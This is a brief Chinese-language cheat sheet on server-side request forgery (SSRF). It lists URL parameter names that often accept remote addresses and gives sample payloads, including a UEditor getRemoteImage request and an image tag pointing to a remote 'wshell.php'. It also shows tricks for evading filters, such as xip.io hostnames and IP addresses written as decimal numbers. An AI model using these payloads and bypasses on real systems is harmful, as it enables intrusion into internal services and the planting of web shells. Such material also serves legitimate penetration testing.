URL中与SSRF相关的字段 relativePath url site path message=[img]http://myserver/wshell.php?logo.jpg[/img] query src src_url sr id vtTopicId //ebs operator(weblogic:SearchPublicRegistries) inputFile column_url preview sIconUrl/sUrl picPath qrcodeUrl fileName upfile(ueditor/jsp/getRemoteImage.jsp?upfile=http://**.**.**.**/sex.jsp%23.jpg) img source pageurl redirect Ueditor imageUp.jsp controller.php getRemoteImage.jsp source[] upfile ewebeditr eWebEditor_UploadText xheditor saveremoteimg proxy?s= view_img.php imgurl link href apiurl resourceUrl SSRF绕过: http://10.13.199.124.xip.io:8080 www.127.0.0.1.xip.io http://168675196:8080 可以将IP转换为10进制绕过